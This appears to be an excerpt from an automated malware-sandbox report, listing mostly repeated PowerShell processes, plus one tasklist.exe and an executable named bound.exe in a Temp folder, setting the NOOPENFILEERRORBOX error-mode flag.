                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
